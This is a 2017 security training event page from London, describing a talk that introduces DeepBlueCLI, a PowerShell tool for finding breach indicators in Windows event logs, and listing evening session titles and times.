Register Today! Online Training Special: Get an iPad Pro w/ Smart Keyboard, HP ProBook, or $350 Off with Online Training!

London March 2017

London, United Kingdom | Mon, Mar 13 - Sat, Mar 18, 2017
This event is over,
but there are more training opportunities.

Introducing DeepBlueCLI, a PowerShell module for hunt teaming via Windows event logs

  • Eric Conrad
  • Tuesday, March 14th, 7:00pm - 8:00pm

A number of events are triggered in Windows environments during virtually every successful breach, these include: service creation events and errors, user creation events, extremely long command lines, compressed and base64 encoded PowerShell functions, and more. Microsoft has added a wealth of blue team tools to its operating systems, including native support of logging the full command line used to launch all processes, without requiring 3rd party tools (or Sysmon). KB3004375 adds this feature to Windows 7 and Server 2008R2. DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell.


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
Monday, March 13
Session Speaker Time Type
Keynote: Lets reverse exploits - IoT, RansomWare & More James Lyne Monday, March 13th, 7:00pm - 9:00pm Keynote
Tuesday, March 14
Session Speaker Time Type
Introducing DeepBlueCLI, a PowerShell module for hunt teaming via Windows event logs Eric Conrad Tuesday, March 14th, 7:00pm - 8:00pm SANS@Night
Wednesday, March 15
Session Speaker Time Type
Bypassing iOS application anti-debugging technique and jailbreak detection Alexandre Becholey Wednesday, March 15th, 6:00pm - 7:00pm SANS@Night
The 14 Absolute Truths of Security Keith Palmgren Wednesday, March 15th, 7:00pm - 8:00pm SANS@Night